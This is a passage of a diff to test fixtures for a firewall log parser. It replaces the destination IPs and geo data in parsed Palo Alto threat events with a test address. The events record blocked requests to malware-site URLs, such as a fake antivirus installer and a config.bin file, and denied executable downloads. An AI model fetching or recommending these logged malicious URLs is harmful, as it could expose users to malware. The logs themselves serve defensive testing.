09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", + "ingested": "2021-12-09T13:42:59.079287400Z", + "original": "Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "created": "2012-10-30T09:53:58.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6707,23 +6693,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6739,7 +6727,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6780,7 +6768,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AMcTUl91PN0z8TJr2QwdEOP+Fmo=", + "community_id": "1:Q4nvWFoSeEki/rbya7cqvARiQi8=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6816,14 +6804,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545669877Z", - "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079292300Z", + "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:55:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6846,26 +6834,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6881,7 +6868,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6922,7 +6909,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7Tdwe73AJMSdJL4hxpQDyl5Lwn4=", + "community_id": "1:6ovStyNF6gHrKTo/Q05+3qFBMNM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6958,14 +6945,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545677102Z", - "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079296300Z", + "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:56:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6988,26 +6975,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7023,7 +7009,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7064,7 +7050,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q7ERSuCoAPSiI8xLXZCI+1M9B8I=", + "community_id": "1:Xm3NWlcLQMLGItqDbcIMdKH+qek=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -7100,14 +7086,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545684398Z", - "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079300900Z", + "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7130,26 +7116,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7165,7 +7150,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7206,7 +7191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AsPpOgQhhKdBtPhY4zahdBuNcTc=", + "community_id": "1:d7zW/Z+qbkM84EVWHsgcDUV40MY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -7242,14 +7227,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545691808Z", - "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079305200Z", + "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:38.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7272,26 +7257,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7307,7 +7291,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7348,7 +7332,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -7384,14 +7368,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545700774Z", - "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079309100Z", + "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7414,26 +7398,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7449,7 +7432,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7490,7 +7473,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -7526,14 +7509,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545708560Z", - "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079313100Z", + "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7570,28 +7553,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Brea", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -117.8854, - "lat": 33.9339 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 26347, + "number": 4837, "organization": { - "name": "New Dream Network, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "173.236.179.57" + "ip": "175.16.199.1" }, - "message": "173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7632,7 +7614,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=", + "community_id": "1:dd+2RtCBMUfATx7W9zSc0ZBYnK0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -7667,15 +7649,15 @@ "crusher" ], "ip": [ - "173.236.179.57", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545715753Z", - "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079316600Z", + "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7698,26 +7680,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7733,7 +7714,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7774,7 +7755,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -7810,14 +7791,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545722883Z", - "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079321700Z", + "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7854,28 +7835,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-QC", - "city_name": "Montreal", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "European Union", - "region_name": "Quebec", + "region_name": "Jilin", "location": { - "lon": -73.5848, - "lat": 45.4995 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.209.163.202" + "ip": "175.16.199.1" }, - "message": "91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7916,7 +7896,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dHpseryW+AZk/t5IUvlyhaLSGI0=", + "community_id": "1:hh9v5OE+zszAvwG3xMpfjtFz8B0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -7951,15 +7931,15 @@ "crusher" ], "ip": [ - "91.209.163.202", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545729995Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079327600Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7997,26 +7977,26 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-ZJ", + "region_iso_code": "CN-JL", "country_iso_code": "CN", "country_name": "China", "name": "China", - "region_name": 